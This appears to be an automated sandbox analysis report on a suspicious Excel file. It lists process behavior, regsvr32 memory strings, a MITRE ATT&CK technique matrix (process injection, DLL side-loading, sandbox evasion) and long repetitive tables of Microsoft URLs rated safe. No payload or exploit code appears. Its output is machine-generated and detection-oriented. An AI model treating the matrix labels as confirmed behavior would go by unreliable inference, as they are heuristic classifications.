    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 1111Jump to behavior
    Source: C:\Windows\splwow64.exeLast function: Thread delayed
    Source: C:\Windows\splwow64.exeLast function: Thread delayed
    Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
    Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
    Source: regsvr32.exe, 00000006.00000002.692913255.0000000000E10000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: regsvr32.exe, 00000006.00000002.692913255.0000000000E10000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: regsvr32.exe, 00000006.00000002.692913255.0000000000E10000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: regsvr32.exe, 00000006.00000002.692913255.0000000000E10000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting2DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution2Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Extra Window Memory Injection1Virtualization/Sandbox Evasion1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting2LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonRegsvr321Cached Domain CredentialsSystem Information Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://directory.services.0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe
    https://staging.cortana.ai0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
      high
      https://login.microsoftonline.com/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
        high
        https://shell.suite.office.com:1443EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
            high
            https://autodiscover-s.outlook.com/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                high
                https://cdn.entity.EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/queryEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                  high
                  https://clients.config.office.net/user/v1.0/tenantassociationkeyEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                      high
                      https://powerlift.acompli.netEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v1EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                        high
                        https://cortana.aiEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspxEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                  high
                                  https://api.aadrm.com/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                    high
                                    https://api.microsoftstream.com/api/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                        high
                                        https://cr.office.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControlEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                            high
                                            https://graph.ppe.windows.netEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                            high
                                                            https://graph.windows.netEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                        high
                                                                        https://ncus.contentsync.EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                    high
                                                                                    https://management.azure.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                high
                                                                                                https://api.office.netEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/logEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/importsEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/macEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.aiEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.comEB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/EB5EB814-F278-44A1-A618-8F2C364FB0C1.1.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
